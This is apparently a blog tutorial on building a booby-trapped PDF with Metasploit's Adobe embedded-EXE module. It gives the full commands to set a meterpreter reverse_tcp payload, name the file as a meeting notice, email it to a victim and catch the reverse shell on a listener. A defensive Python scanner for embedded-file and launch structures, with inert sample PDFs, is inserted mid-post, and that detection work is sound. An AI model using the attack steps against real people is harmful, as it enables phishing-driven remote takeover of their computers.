Thursday, 1 May 2014

File Format Exploit!

File format bugs are exploitable vulnerabilities in the way an application parses a particular file type, such as an Adobe PDF document. This class of exploit relies on a user actually opening a malicious file in a vulnerable application. Malicious files can be hosted remotely or sent via e-mail.
In this tutorial I will demonstrate a client-side attack using the Adobe PDF Embedded EXE vulnerability. Almost 95% (maybe) of Windows users have the Adobe Acrobat (Acrobat Reader) application installed on their computers or laptops.

The first step is to create the malicious PDF used in this attack, using the vulnerability in Adobe Reader:

msf > use exploit/windows/fileformat/adobe_pdf_embedded_exe_nojs
msf > set payload windows/meterpreter/reverse_tcp
msf > set filename Important_Meeting_Notice.pdf
msf > set lhost 192.168.8.92
msf > set lport 443
msf > exploit

The next step is to send the malicious PDF to the target's e-mail address.

After sending the malicious PDF, we need to set up a listener to capture the reverse connection. We will use msfconsole to set up a multi/handler listener. This ensures that when the exploit is triggered, the attacker machine can receive the connection back from the target machine (reverse payload).

msf exploit(adobe_pdf_embedded_exe_nojs) > use multi/handler
msf exploit(handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST 192.168.8.92
LHOST => 192.168.8.92
msf exploit(handler) > set LPORT 443
LPORT => 443
msf exploit(handler) > exploit -j
[*] Exploit running as background job.
[*] Started reverse handler on 192.168.8.92:443
[*] Starting the payload handler...
msf exploit(handler) >

When the victim opens the malicious PDF, an alert box appears; the attack relies on the victim ticking "Do not show this message again" and clicking Open.
Once the victim clicks the Open button, our listener captures the reverse connection.
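From the defender's side, the document produced above is a PDF that carries an embedded file and an action that launches it when the reader opens the document, which is why Reader shows the launch warning the victim is asked to click through. The following scanner is an added example and not part of the original post or of Metasploit; it assumes the relevant structures are an /EmbeddedFile stream together with a /Launch, /OpenAction or similar action (the post names only the module, not the PDF objects it writes), and the two sample PDFs, including the executable filename, are constructed fixtures rather than output of the module.

```python
import re
from typing import Dict, List

# PDF name objects that, in combination, signal a document built to carry and
# launch an embedded executable. Assumption: these are the structures such a
# PDF needs; the post only names the Metasploit module, not the objects it emits.
SUSPICIOUS_NAMES = {
    b"/EmbeddedFile": "embedded file stream",
    b"/Launch": "launch action (opens an external file or program)",
    b"/OpenAction": "action run automatically when the document opens",
    b"/AA": "additional (automatic) actions",
    b"/JavaScript": "JavaScript action",
    b"/JS": "JavaScript code",
}

# Filenames with executable extensions referenced anywhere in the file.
EXE_NAME_RE = re.compile(rb"[\w.\-]+\.(?:exe|scr|bat|cmd|com|pif)(?![A-Za-z0-9])", re.IGNORECASE)


def normalize_names(data: bytes) -> bytes:
    """Undo #xx hex escapes in PDF names so /L#61unch is seen as /Launch."""
    return re.sub(rb"#([0-9A-Fa-f]{2})", lambda m: bytes([int(m.group(1), 16)]), data)


def count_indicators(data: bytes) -> Dict[str, int]:
    """Count each suspicious name; a longer name it merely prefixes (/EmbeddedFiles) is not counted."""
    found: Dict[str, int] = {}
    for name in SUSPICIOUS_NAMES:
        n = len(re.findall(re.escape(name) + rb"(?![A-Za-z0-9])", data))
        if n:
            found[name.decode()] = n
    return found


def executable_names(data: bytes) -> List[str]:
    """Distinct executable-looking filenames mentioned in the file, lower-cased."""
    return sorted({m.group(0).decode(errors="replace").lower() for m in EXE_NAME_RE.finditer(data)})


def verdict(indicators: Dict[str, int], exe_names: List[str]) -> str:
    """'high' when an embedded file is paired with an action (or a launch names an executable)."""
    has_embed = "/EmbeddedFile" in indicators
    has_action = any(k in indicators for k in ("/Launch", "/OpenAction", "/AA", "/JavaScript", "/JS"))
    if (has_embed and has_action) or ("/Launch" in indicators and exe_names):
        return "high"
    if indicators or exe_names:
        return "medium"
    return "clean"


def scan_pdf_bytes(data: bytes) -> dict:
    """Scan raw PDF bytes and return indicator counts, executable names and a verdict."""
    data = normalize_names(data)
    ind = count_indicators(data)
    exes = executable_names(data)
    return {"indicators": ind, "executable_names": exes, "verdict": verdict(ind, exes)}


def scan_pdf_file(path: str) -> dict:
    with open(path, "rb") as fh:
        return scan_pdf_bytes(fh.read())


# Constructed fixture (not a real exploit file): the minimal object layout of a
# PDF that embeds a file named like an executable and launches it on open. The
# stream content is a placeholder, so the fixture does nothing if opened.
EMBEDDED_EXE_SAMPLE = b"""%PDF-1.5
1 0 obj << /Type /Catalog /Pages 2 0 R /OpenAction 5 0 R
  /Names << /EmbeddedFiles << /Names [(Important_Meeting_Notice.exe) 4 0 R] >> >> >> endobj
2 0 obj << /Type /Pages /Kids [3 0 R] /Count 1 >> endobj
3 0 obj << /Type /Page /Parent 2 0 R /MediaBox [0 0 612 792] >> endobj
4 0 obj << /Type /Filespec /F (Important_Meeting_Notice.exe) /EF << /F 6 0 R >> >> endobj
5 0 obj << /S /Launch /F (Important_Meeting_Notice.exe) >> endobj
6 0 obj << /Type /EmbeddedFile /Length 4 >> stream
MZ..
endstream endobj
trailer << /Root 1 0 R >>
%%EOF
"""

# Constructed benign fixture: one page of text, no embedded files or actions.
CLEAN_SAMPLE = b"""%PDF-1.5
1 0 obj << /Type /Catalog /Pages 2 0 R >> endobj
2 0 obj << /Type /Pages /Kids [3 0 R] /Count 1 >> endobj
3 0 obj << /Type /Page /Parent 2 0 R /MediaBox [0 0 612 792] /Contents 4 0 R >> endobj
4 0 obj << /Length 58 >> stream
BT /F1 12 Tf 72 720 Td (Important_Meeting_Notice.pdf) Tj ET
endstream endobj
trailer << /Root 1 0 R >>
%%EOF
"""

if __name__ == "__main__":
    for label, sample in (("embedded-exe fixture", EMBEDDED_EXE_SAMPLE), ("clean fixture", CLEAN_SAMPLE)):
        print(label, scan_pdf_bytes(sample))
```

A byte-level scan like this is a triage step, not a parser: names inside compressed object streams are not visible until the streams are inflated, so a mail gateway or sandbox should decompress before matching, and the hex-escape normalisation above only covers the simplest evasion. Combined with the Reader launch warning the post describes, the useful lesson for defenders is that an inbound PDF with an embedded file plus any open-time or launch action deserves quarantine before it reaches a user who may tick "Do not show this message again".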

We have successfully exploited a file format vulnerability by creating a malicious document with Metasploit and then sending it to our targeted user.
As a penetration tester, every bit of information can be used to craft an even better attack. Browser exploits and file format exploits are typically very effective, provided you do your homework.
